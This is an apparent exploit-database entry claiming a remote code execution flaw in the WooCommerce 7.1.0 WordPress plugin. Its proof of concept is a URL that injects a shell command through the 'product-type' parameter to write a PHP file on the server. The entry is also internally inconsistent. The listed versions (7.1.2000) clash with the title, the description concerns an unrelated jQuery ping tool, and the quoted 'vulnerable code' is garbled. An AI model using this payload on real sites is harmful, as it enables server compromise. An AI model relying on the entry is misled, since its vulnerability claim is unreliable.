Wordpress Plugin WooCommerce v7.1.0 - Remote Code Execution(RCE)

vendor:

WooCommerce

by:

Milad Karimi

7.5

CVSS

HIGH

Remote Code Execution

CWE

Product Name: WooCommerce

Affected Version From: 7.1.2000

Affected Version To: 7.1.2000

Patch Exists: YES

Related CWE:

CPE: a:wordpress:woocommerce:7.1.0

Metasploit:

Other Scripts:

Platforms Tested: Windows 10, Firefox

2022

WordPress Plugin WooCommerce v7.1.0 – Remote Code Execution(RCE)

The vulnerability allows an attacker to execute arbitrary code on the target system by injecting PHP code through a crafted request to the affected plugin.

Mitigation:

Update to the latest version of the WooCommerce plugin to patch the vulnerability.

Source

Exploit-DB raw data:

# Title: Wordpress Plugin WooCommerce v7.1.0 - Remote Code Execution(RCE)
# Date: 2022-12-07
# Author: Milad Karimi
# Vendor Homepage: https://wordpress.org/plugins/woocommerce
# Software Link: https://wordpress.org/plugins/woocommerce
# Tested on: windows 10 , firefox
# Version: 7.1.0
# CVE : N/A

# Description:
simple, easy to use jQuery frontend to php backend that pings various
devices and changes colors from green to red depending on if device is
up or down.

# PoC :

http://localhost/woocommerce/includes/admin/meta-boxes/class-wc-meta-box-product-images.php?product-type=;echo '<?php phpinfo(); ?>' >info.php
http://localhost/woocommerce/includes/admin/meta-boxes/class-wc-meta-box-product-images.php?product-type=;echo '<?php phpinfo(); ?>' >info.php


# Vulnerabile code:

 95: $classname $classname($post_id); 
  94: $classname = WC_Product_Factory::get_product_classname($post_id, $product_type : 'simple'); 
    92: ⇓ function save($post_id, $post)
       93: $product_type = WC_Product_Factory::get_product_type($post_id) : sanitize_title(stripslashes($_POST['product-type'])); 
          92: ⇓ function save($post_id, $post)